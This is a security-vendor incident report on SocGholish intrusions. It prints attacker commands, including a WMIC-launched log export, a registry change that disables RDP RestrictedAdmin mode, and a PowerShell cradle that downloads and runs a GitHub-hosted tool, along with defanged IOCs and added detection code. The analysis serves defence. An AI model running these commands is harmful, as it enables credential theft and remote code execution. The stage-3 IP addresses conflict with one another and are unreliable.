Editor’s note: Dean Murphy, Brandon Tirado, and Joseph Morales all contributed to this blog.
The “SocGholish” (aka FakeUpdates) malware distribution framework has presented a gripping tale of intrigue and suspense for ReliaQuest this year. Just in January, we’ve identified and responded to two discrete “hands-on-keyboard” intrusions traced back to a SocGholish compromise. We contained both intrusions by preventing what looked like the threat actor’s primary objective: deploying ransomware.
Think of SocGholish primarily as a preliminary foothold that provides access for additional cyber-crime groups. Across these two intrusions, we found overlapping artifacts suggesting that the compromises originate from the same threat actor. During our investigations we found network telemetry tied to Evil Corp infrastructure, possibly indicating their involvement. Read on to find out what else we observed in this page-turner of an assessment.
What Is SocGholish?
Figure 1: SocGholish fake update link
Notable Findings: Network
Telemetry sources for our investigations into these events rely on information fed into GreyMatter by our customers. This gives us increased visibility, unifies disparate workflows, and allows quicker responses to active intrusions.
taxes[.]rpacx[.]com.” The HTML DOM represents the structure of the website; it was hosting the stage 2 SocGholish payload: the fake update.
Figure 2: SocGholish site details
Figure 3: SocGholish HTML DOM
wscript.exe) sprang into action to execute it. Execution of the payload established C2 with a stage 3 site. In these intrusion sets, the stage 3 sites were:
These connections were used to receive further instruction and relay the outputs of initial discovery commands staged in TXT files, located at the filepath
When reviewing the IP addresses hosting the stage 3 domains, we discovered another commonality. Both domains resolved to the same IP address: 126.96.36.199. The VirusTotal passive DNS entry for this IP address showed various subdomains being used.
We also found similar payloads tied to that IP address. We used the following VirusTotal intelligence query:
type:js AND name:update.js AND contacted_ip:188.8.131.52
Figure 4: VirusTotal Intelligence Query
Figure 5: Passive DNS replications for 88.119.169[.]108
Shortly after the initial compromises, the threat actor used the SocGholish C2 channels to transfer a Cobalt Strike HTTPS beacon to the compromised hosts. Intrusion set 1 showed that the HTTPS beacon established a C2 channel with the C2 server change-land[.]com (31.184.254[.]115). These were the initial signals identified by the ReliaQuest Threat Hunting team that prompted a response. As it turns out, the domain belongs to a cluster of infrastructure that we feel moderately confident is used by the notorious Evil Corp cyber-crime syndicate.
The remaining artifacts observed relate to Intrusion set 1. Due to a combination of a swift response and a dormant threat actor in Intrusion set 2, no additional post-exploitation activity was carried out after the HTTP beacon executed.
With the HTTPS beacon executing, additional information discovery efforts took place and enabled the threat actor to start attempting to move laterally. In this intrusion set, the threat actor seemed to favor an interactive session, making use of remote desktop protocol (RDP) and a valid admin account to pivot to a server on the network. Success led to even more discovery efforts from this endpoint. Of those discovery efforts, most were “textbook” ransomware affiliate operations, but one operation stood out.
Notable Findings: Endpoint
The Windows Management Instrumentation Command-line (WMIC) was used to connect to a domain controller to execute this command:
wmic /node:redacted.remote.host process call create 'wevtutil epl Security C:\programdata\redacted.evtx /q:Event[System[(EventID=4776)]]'
This command uses wevtutil to retrieve the Windows Security Event ID 4776 logs (the domain controller attempted to validate the credentials for an account) from the domain controller and store the output within this drive:
Typically, we’ve observed wevtutil used for defense evasion, but something else seems afoot here: it was used for discovery objectives, although, at the time of writing, we haven’t found any other public reporting of this utility being used maliciously in this way.
The plotline ebbed a bit at this point, as activity ceased for roughly three days. It resumed with this attacker’s Windows binary of choice: WMIC, used to execute the following command to disable Windows RestrictedAdmin Mode.
process call create cmd /c reg add hklm\System\CurrentControlSet\Control\LSA /f /v disablerestrictedadmin /t REG_DWORD /d 0
This feature, when enabled, prevents credentials used to connect to a remote system via RDP from being stored in memory. With the attacker seen disabling RestrictedAdmin Mode on the endpoint they were operating on, we inferred that they were looking to intercept the credentials of those who would RDP to this device in the future. Access to the credential owners’ password hashes could help facilitate a “pass the hash” attack via RDP: stealing a “hashed” user credential to create a new user session on the same network.
On an adjacent host, we observed WMIC being used to execute a PowerShell download cradle; the following command was run to pull down and execute the UrbanBishop module of PowerSharpPack, which was hosted in a GitHub repository.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1'); PowerSharpPack -UrbanBishop -Command '-i 9876 -p C:\programdata\ch.tmp'
The intent of this specific activity is puzzling, as previous evidence showed that the threat actor was already making use of their Cobalt Strike HTTP beacon. Why the attacker decided to perform ingress tool transfer for an additional way to perform process injection remains inconclusive at this time.
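The endpoint commands described above (remote WMIC process creation, wevtutil export of the Security log, the RestrictedAdmin registry change, the PowerShell download cradle, and wscript.exe running a downloaded .js) share command-line features that can be turned into process-creation detections. The following is an added example, not ReliaQuest's code: it runs simple command-line rules over constructed Sysmon/4688-style events modelled on this report; host names, paths and the URL are placeholders.

```python
import re

# Constructed sample process-creation events (host + command line), modelled on the
# commands observed in this report. Hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS01",
     "cmdline": 'wscript.exe "C:\\Users\\user\\Downloads\\Update.js"'},
    {"host": "WS01",
     "cmdline": "wmic /node:dc01.example.invalid process call create 'wevtutil epl Security "
                "C:\\programdata\\out.evtx /q:Event[System[(EventID=4776)]]'"},
    {"host": "SRV02",
     "cmdline": "wmic process call create cmd /c reg add hklm\\System\\CurrentControlSet\\Control\\LSA "
                "/f /v disablerestrictedadmin /t REG_DWORD /d 0"},
    {"host": "SRV03",
     "cmdline": "powershell -nop -c iex(new-object net.webclient).downloadstring('https://example.invalid/x.ps1')"},
    {"host": "SRV04",
     "cmdline": "wevtutil qe Application /c:5 /f:text"},   # benign admin use, should not fire
]

# Each rule fires only when every pattern matches the command line (case-insensitive).
RULES = {
    "wmic_remote_process_create": [r"\bwmic\b", r"/node:", r"process\s+call\s+create"],
    "wevtutil_security_export": [r"\bwevtutil\b", r"\bepl\b", r"\bsecurity\b"],
    "restricted_admin_registry_change": [r"\breg\s+add\b", r"control\\lsa", r"disablerestrictedadmin"],
    "powershell_download_cradle": [r"\b(iex|invoke-expression)\b", r"download(string|file)"],
    "wscript_js_from_user_dir": [r"\bwscript\.exe\b", r"\\users\\[^\\]+\\(downloads|appdata)\\", r"\.js\b"],
}

def evaluate(event):
    """Return the names of all rules that match one event's command line."""
    cmd = event.get("cmdline", "")
    return [name for name, patterns in RULES.items()
            if all(re.search(p, cmd, re.IGNORECASE) for p in patterns)]

def scan(events):
    """Return (host, rule) pairs for every rule hit across the event list."""
    return [(ev["host"], rule) for ev in events for rule in evaluate(ev)]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The wevtutil rule fires on the remote WMIC event as well, since the exported Security log is the suspicious part regardless of how the command was launched; tune the wscript rule to your environment's software-update paths before deploying.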
And that’s the end of the saga; after this point, the intrusion was contained, and the threat actor evicted from the customer’s environment.
SocGholish is well practiced in such plotlines: disguising fake updates and tricking browser or system users into malicious downloads. In other words, don’t take it lightly. As demonstrated by the events above, a SocGholish infection can lead to a much more severe situation than just an infected endpoint. We’re highly confident that the attacker’s final objective was to deploy ransomware, based on their techniques, infrastructure ties to Evil Corp, and intelligence on previous intrusions that started with SocGholish.
The ReliaQuest GreyMatter security operations platform empowers customers to investigate, detect, and respond to the threats that matter most. The platform increases visibility to help you get the most out of your existing security investments and reduces the complexity of the DIR lifecycle. This ultimately allows ReliaQuest and our customers to efficiently counter known and emerging threats. We provide customers with detection capabilities and actionable intelligence to hinder the implications of a SocGholish infection. Here are some agnostic recommendations for any environment to help combat this threat:
Ensure effective logging is in place to identify the initial compromise and any subsequent implications. This telemetry should be shipped to a centralized logging platform to enable detection capabilities.
- Endpoint telemetry, in particular, is vital. Events such as process execution (with command line), registry modification, and file modifications are a good place to start. These logs will help.
- Network telemetry (firewall, netflow, forward proxy, etc.) is also important. These logs, paired with threat intelligence, can help identify traffic to known compromised sites delivering SocGholish payloads as well as the C2 infrastructure used after a breach.
Train staff to identify social engineering tactics employed on the web. SocGholish uses social engineering to prompt Internet users to download fraudulent browser or system upgrades.
- Launch a channel for employees to report social engineering attempts they’ve spotted (or fallen for).
- Supply employees with trusted local or remote sites for software updates.
taxes.rpacx[.]com (SocGholish stage 2 domain)
*.signing.unitynotarypublic[.]com (SocGholish C2 domain)
*.asset.tradingvein[.]xyz (SocGholish C2 domain)
88.119.169[.]108 (SocGholish C2 IP)
change-land[.]com (Cobalt Strike C2)
31.184.254[.]115 (Cobalt Strike C2)
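The network recommendation above pairs proxy or DNS telemetry with threat intelligence, and the indicator list is published defanged with "[.]" and "*." wildcards. This added example (not ReliaQuest's code) refangs those indicators, distinguishes IPs, exact hosts and wildcard subdomains, and runs the resulting matcher over constructed proxy log lines; the timestamps, client addresses and URL paths are made up.

```python
import ipaddress

# The indicators listed above, exactly as published (defanged).
IOCS = {
    "taxes.rpacx[.]com": "SocGholish stage 2 domain",
    "*.signing.unitynotarypublic[.]com": "SocGholish C2 domain",
    "*.asset.tradingvein[.]xyz": "SocGholish C2 domain",
    "88.119.169[.]108": "SocGholish C2 IP",
    "change-land[.]com": "Cobalt Strike C2",
    "31.184.254[.]115": "Cobalt Strike C2",
}

def refang(value):
    """Turn a defanged indicator back into a matchable, normalised value."""
    return value.replace("[.]", ".").strip().lower()

def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def build_matcher(iocs):
    """Sort indicators into IP, exact-host and wildcard tables and return a lookup."""
    exact, wildcard = {}, {}
    for raw, label in iocs.items():
        v = refang(raw)
        if v.startswith("*."):
            wildcard[v[2:]] = label   # "*.x.y" matches hosts under x.y, not x.y itself
        else:
            exact[v] = label          # IPs and plain hostnames are both exact matches
    def match(host):
        h = host.lower().rstrip(".")
        if h in exact:
            return exact[h]
        return next((lab for suf, lab in wildcard.items() if h.endswith("." + suf)), None)
    return match

# Constructed proxy log lines: timestamp, client IP, destination host, URL path.
SAMPLE_LOGS = [
    "2023-01-10T10:02:11Z 10.0.0.5 taxes.rpacx.com /report.php",
    "2023-01-10T10:02:15Z 10.0.0.5 abcd.signing.unitynotarypublic.com /",
    "2023-01-10T10:03:40Z 10.0.0.5 signing.unitynotarypublic.com /",
    "2023-01-10T11:15:02Z 10.0.0.7 31.184.254.115 /",
    "2023-01-10T11:16:00Z 10.0.0.7 www.example.com /index.html",
]

def scan(lines, iocs=IOCS):
    """Return (client, host, label) for each log line whose destination hits an indicator."""
    match = build_matcher(iocs)
    hits = []
    for line in lines:
        _ts, client, host, _path = line.split(" ", 3)
        label = match(host)
        if label:
            hits.append((client, host, label))
    return hits
```

Note that a "*." indicator deliberately does not match the apex host itself (the third log line), so widen the wildcard table if your intelligence source intends apex coverage.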